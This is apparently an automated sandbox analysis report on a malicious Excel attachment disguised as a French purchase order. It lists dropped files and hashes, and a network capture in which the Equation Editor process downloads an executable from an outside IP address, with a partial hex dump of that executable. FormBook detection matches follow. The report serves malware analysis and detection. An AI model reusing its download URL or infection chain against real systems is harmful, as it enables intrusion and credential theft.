                                        Encrypted:false
                                        SSDEEP:1536:ZXCgcfyN02EkOn1m8GFY9MgSlAzLVLQPxr3g1SBKhD9Z26u:ZXSi02EkYHGOMPlUCPxLbopZ
                                        MD5:981661FB35D158853F012F21AADD7B92
                                        SHA1:2CE93CBF7651C472A598B8756F5301275D95E27F
                                        SHA-256:3084B6D063C6EC61503E90E6F2C61830EC915593FED9DDC719F67BC1EC24B49A
                                        SHA-512:E676218BBDC01687242E9E7695F838CD33E84E57E4E844ADBD307421315A3E5AC56267704685EF1A4E99C36EA1A6D1368433FEA736AA5E981265A5CF6BCE03B5
                                        Malicious:false
                                        Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):512
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                        Malicious:false
                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):512
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                        Malicious:false
                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):512
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3::
                                        MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                        Malicious:false
                                        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):165
                                        Entropy (8bit):1.4377382811115937
                                        Encrypted:false
                                        SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                        MD5:797869BB881CFBCDAC2064F92B26E46F
                                        SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                        SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                        SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                        Malicious:true
                                        Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                        Category:dropped
                                        Size (bytes):263783
                                        Entropy (8bit):7.9127214183326275
                                        Encrypted:false
                                        SSDEEP:3072:LODZGPEounb6dFqeTHg1WG3Tpf8o7j8kRSLCXD35Zq66TvNJsd19vQ1/A3wCEGj7:LOtIO6RsBTpfD7lRVq6uJM194uLiC87i
                                        MD5:5AF1C7DD89A535DEE51C3E28B4A74F8D
                                        SHA1:A4BEACE30EF4B975E247AFBAF837E757A5372F7E
                                        SHA-256:039EF59E7502A98D0B9A6A7E7818444F6DBD699A4CDB10A8DBA031222CFDDE6F
                                        SHA-512:28C4CAC036B93D8943D42613DC8C703A66D291393760524C22E0FCD76E7B67CE73E40704C29321E42765364638F0EE3C11AF52922700570BA47AB661B846A7F7
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....Oa.................h....:.....F6............@...........................;...........@...........................................;.P............................................................................................................text....g.......h.................. ..`.rdata...............l..............@..@.data.....9.........................@....ndata........:..........................rsrc...P.....;.....................@..@................................................................................................................................................................................................................................................................................................................................................
                                        File type:CDFV2 Encrypted
                                        Entropy (8bit):7.924269341639024
                                        TrID:
                                        • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                        File name:BON DE COMMANDE POUR CHENOUFI AEK.xlsx
                                        File size:95744
                                        MD5:981661fb35d158853f012f21aadd7b92
                                        SHA1:2ce93cbf7651c472a598b8756f5301275d95e27f
                                        SHA256:3084b6d063c6ec61503e90e6f2c61830ec915593fed9ddc719f67bc1ec24b49a
                                        SHA512:e676218bbdc01687242e9e7695f838cd33e84e57e4e844adbd307421315a3e5ac56267704685ef1a4e99c36ea1a6d1368433fea736aa5e981265a5cf6bce03b5
                                        SSDEEP:1536:ZXCgcfyN02EkOn1m8GFY9MgSlAzLVLQPxr3g1SBKhD9Z26u:ZXSi02EkYHGOMPlUCPxLbopZ
                                        TLSH:4793014833DE4E98E5A30379DDA4DCA7ABC46D2A9E3321D3358131ADF2B05109EA547F
                                        File Content Preview:........................>......................................................................................................................................................................................................................................
                                        Icon Hash:e4e2aa8aa4b4bcb4
                                        TimestampSource PortDest PortSource IPDest IP
                                        May 13, 2022 17:07:41.349982977 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:41.565598011 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:41.565769911 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:41.567938089 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:41.784928083 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:41.784980059 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:41.785007954 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:41.785031080 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:41.785044909 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:41.785075903 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:41.785079956 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.000262022 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.000288963 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.000305891 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.000319004 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.000335932 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.000353098 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.000370979 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.000386953 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.000448942 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.000498056 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.215287924 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.215338945 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.215358973 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.215373993 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.215385914 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.215403080 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.215420008 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.215435982 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.215451956 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.215468884 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.215485096 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.215501070 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.215517044 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.215533972 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.215549946 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.215558052 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.215567112 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.215593100 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.215598106 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.215600967 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.215604067 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.219461918 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.430604935 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.430644035 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.430661917 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.430680990 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.430690050 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.430697918 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.430716991 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.430726051 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.430730104 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.430736065 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.430746078 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.430753946 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.430757046 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.430771112 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.430774927 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.430788994 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.430792093 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.430807114 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.430826902 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.430844069 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.430849075 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.430862904 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.430865049 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.430881023 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.430885077 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.430898905 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.430902004 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.430917978 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.430918932 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.430934906 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.430939913 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.430953979 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.430955887 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.430972099 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.430974960 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.430989981 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.430998087 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.431008101 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.431016922 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.431026936 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.431045055 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.431055069 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.431060076 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.431062937 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.431078911 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.431081057 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.431082964 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.431099892 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.431107044 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.431118011 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.431123018 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.431133986 CEST8049171103.156.91.153192.168.2.22
                                        May 13, 2022 17:07:42.431138992 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.431154966 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.431169033 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.435108900 CEST4917180192.168.2.22103.156.91.153
                                        May 13, 2022 17:07:42.645956993 CEST8049171103.156.91.153192.168.2.22
                                        • 103.156.91.153
                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.2.2249171103.156.91.15380C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        TimestampkBytes transferredDirectionData
                                        May 13, 2022 17:07:41.567938089 CEST2OUTGET /fdcloudfiles/vbc.exe HTTP/1.1
                                        Accept: */*
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: 103.156.91.153
                                        Connection: Keep-Alive
                                        May 13, 2022 17:07:41.784928083 CEST3INHTTP/1.1 200 OK
                                        Date: Fri, 13 May 2022 15:07:42 GMT
                                        Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
                                        Last-Modified: Fri, 13 May 2022 06:57:17 GMT
                                        ETag: "40667-5dedf2f5fd4c5"
                                        Accept-Ranges: bytes
                                        Content-Length: 263783
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: application/x-msdownload
                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a8 21 60 47 ec 40 0e 14 ec 40 0e 14 ec 40 0e 14 2f 4f 51 14 ee 40 0e 14 ec 40 0f 14 49 40 0e 14 2f 4f 53 14 e3 40 0e 14 b8 63 3e 14 e0 40 0e 14 2b 46 08 14 ed 40 0e 14 52 69 63 68 ec 40 0e 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a9 9a 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 12 3a 00 00 08 00 00 46 36 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 a0 3b 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 85 00 00 a0 00 00 00 00 90 3b 00 50 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 67 00 00 00 10 00 00 00 68 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9a 13 00 00 00 80 00 00 00 14 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 eb 39 00 00 a0 00 00 00 06 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 00 01 00 00 90 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 50 0a 00 00 00 90 3b 00 00 0c 00 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$!`G@@@/OQ@@I@/OS@c>@+F@Rich@PELOah:F6@;@;P.textgh `.rdatal@@.data9@.ndata:.rsrcP;@@


                                        Click to jump to process

                                        Target ID:0
                                        Start time:17:07:16
                                        Start date:13/05/2022
                                        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                        Imagebase:0x13fb90000
                                        File size:28253536 bytes
                                        MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Target ID:2
                                        Start time:17:07:42
                                        Start date:13/05/2022
                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                        Imagebase:0x400000
                                        File size:543304 bytes
                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Target ID:4
                                        Start time:17:07:47
                                        Start date:13/05/2022
                                        Path:C:\Users\Public\vbc.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\Public\vbc.exe"
                                        Imagebase:0x400000
                                        File size:263783 bytes
                                        MD5 hash:5AF1C7DD89A535DEE51C3E28B4A74F8D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        Reputation:low

                                        Target ID:5
                                        Start time:17:07:48
                                        Start date:13/05/2022
                                        Path:C:\Users\user\AppData\Local\Temp\bmexo.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya
                                        Imagebase:0xf20000
                                        File size:80384 bytes
                                        MD5 hash:FD42CBBC6D53AD34694C46731AABD852
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.979111122.0000000000170000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.979111122.0000000000170000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.979111122.0000000000170000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        Target ID:6
                                        Start time:17:07:50
                                        Start date:13/05/2022
                                        Path:C:\Users\user\AppData\Local\Temp\bmexo.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya
                                        Imagebase:0xf20000
                                        File size:80384 bytes
                                        MD5 hash:FD42CBBC6D53AD34694C46731AABD852
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.976211361.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.976211361.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.976211361.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1050132752.00000000000F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1050132752.00000000000F0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1050132752.00000000000F0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1050307444.0000000000430000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1050307444.0000000000430000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1050307444.0000000000430000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        Target ID:7
                                        Start time:17:07:55
                                        Start date:13/05/2022
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Explorer.EXE
                                        Imagebase:0xff040000
                                        File size:3229696 bytes
                                        MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.1007465925.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.1007465925.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.1007465925.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.1020176757.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.1020176757.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.1020176757.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:high

                                        Target ID:8
                                        Start time:17:08:24
                                        Start date:13/05/2022
                                        Path:C:\Windows\SysWOW64\chkdsk.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\chkdsk.exe
                                        Imagebase:0x80000
                                        File size:16384 bytes
                                        MD5 hash:A01E18A156825557A24A643A2547AA8C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.1173044498.0000000000300000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.1173044498.0000000000300000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.1173044498.0000000000300000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
